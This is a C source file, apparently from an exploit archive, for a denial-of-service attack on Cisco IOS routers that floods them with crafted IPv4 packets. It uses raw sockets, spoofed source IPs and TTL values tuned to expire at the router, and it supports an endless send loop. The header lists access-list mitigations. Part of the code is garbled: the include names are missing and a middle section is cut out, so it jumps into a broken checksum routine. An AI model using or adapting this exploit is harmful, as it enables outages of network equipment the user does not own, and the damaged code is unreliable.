|
Cisco IOS IPv4 Packet DoS Exploit (cisco-bug-44020.c)
|
* cisco-bug-44020.tar.gz *
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge () */
/* */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* */
/* This exploit uses the bug in recent IOS versions to stop router */
/* from processing traffic once the input queue is full. */
/* */
/* */
/* Use access control lists as described in the CISCO advisory to */
/* protect your cisco routers: */
/* */
/* access-list 101 deny 53 any any */
/* access-list 101 deny 55 any any */
/* access-list 101 deny 77 any any */
/* access-list 101 deny 103 any any */
/* */
/* This code was only tested on linux, no warranty is or will be */
/* */
/* Usage: ./cisco-bug-44020 */
/* Source IP: Your source IP (or a spoofed source IP) */
/* Destination IP: The IP of the vulnerable cisco router */
/* Hops: The number of hops between you and the router, */
/* the time to live (ttl) should be 0 when the packet */
/* is received by the cisco router. */
/* Number: Number of packets to send (0 = loop) */
/* provided. */
/*******************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DEBUG
#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif
/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};
char proto[] = {53,55,77,103};
/* Prototypes */
int in_cksum (unsigned short *, int, int);
/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;
unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;
unsigned char *buf;
/* Check command line args */
if(argc != 5) {
fprintf(stderr, "Usage: %s \n\n", argv[0]);
return(EXIT_FAILURE);
}
src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);
if(count == 0) { loop=1; count=1; }
#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif
/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}
/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
|
